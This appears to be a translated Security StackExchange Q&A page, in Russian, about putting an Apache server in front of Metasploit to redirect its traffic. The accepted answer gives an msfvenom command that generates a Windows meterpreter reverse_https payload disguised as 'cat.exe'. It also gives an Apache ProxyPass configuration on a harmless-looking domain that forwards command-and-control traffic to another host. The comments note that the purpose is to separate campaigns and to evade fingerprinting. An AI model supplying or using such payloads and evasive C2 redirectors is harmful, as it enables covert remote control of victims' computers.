Переадресация запросов Metasploit на другой ip

220

Я хотел бы настроить статический веб-сервер Apache, который перенаправляет все входящие соединения Metasploit на другой IP-адрес. Это возможно? Если так, то как? Я хочу запустить сервер Apache на RasPi B +, если это поможет.

1
Добро пожаловать в Security SE! Можете ли вы предоставить больше информации о том, что вы пытаетесь достичь? multithr3at3d 5 лет назад 4
Основываясь на комментарии @ multithr3at3d, неясно, что вы пытаетесь сделать. Apache является веб-сервером и сможет перенаправлять только веб-трафик через определенный порт, поэтому он не сможет перенаправить все «соединения metasploit» на удаленные хосты. Однако если у вас запущен веб-интерфейс Metasploit и вы просто хотите отправлять веб-трафик пользовательского интерфейса на другой веб-сервер, я бы порекомендовал использовать обратный прокси-сервер Nginx. SuperAdmin 5 лет назад 0
@schroeder Здесь не OP, но обычно действительный сервер Apache или nginx настроен на фронт для двух целей: пересылать запросы отдельных кампаний на отдельные серверы C & C и маскировать запросы как идущие на законные HTTP-серверы, чтобы избежать снятия отпечатков пальцев. 5 лет назад 0
@void_in да, угол снятия отпечатков имеет много смысла, на самом деле schroeder 5 лет назад 0

1 ответ на вопрос

2
void_in

Сначала создайте полезную нагрузку:

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe

Самая важная часть - это LURI, который нужно установить для конкретного ресурса. Весь трафик, генерируемый полезной нагрузкой, будет направлен на этот URI.

После этого используйте директиву ProxyPass в Apache или nginx, чтобы перенаправлять только трафик / myawesomecnc на нужный хост. Вот пример Apache:

<VirtualHost *:443>  ServerName www.totallyharmless.com ... ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/ ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/ ... </VirtualHost>

Похожие вопросы